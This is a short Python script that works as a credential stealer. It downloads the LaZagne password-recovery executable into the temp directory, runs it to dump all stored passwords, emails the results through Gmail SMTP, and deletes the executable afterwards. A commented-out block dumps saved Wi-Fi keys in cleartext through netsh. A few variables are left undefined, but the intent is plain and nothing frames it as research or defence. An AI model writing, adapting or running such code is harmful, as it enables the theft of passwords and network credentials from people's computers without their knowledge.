#!/usr/bin/python3.8

import subprocess, re, smtplib, requests, os, tempfile

def send_mail(email,password,message):
	server = smtplib.SMTP("smtp.gmail.com",587)
	server.starttls()
	server.login(email,password)
	server.sendmail(email,email,message)
	server.quit()

"""
command = 'netsh wlan show profile'
networks = subprocess.run(command,shell=True)
networks_list = re.findall('Profile\s*:\s(.*)',networks)

result = ''
for network in networks_list:
	current_result = subprocess.run(command + network + 'key=clear',shell=True)
	result += current_result
"""

def download(url):
	get_response = requests.get(url)
	file_name = url.split('/')[-1]
	with open(file_name,'wb') as f:
		f.write(get_response.content)

tempdir = tempfile.gettempdir()
os.chdir(tempdir)
download(url_to_lazagne)
result = subprocess.check_output('laZagne.exe all',shell=True)
send_mail(email,password,result)
os.remove('laZagne.exe')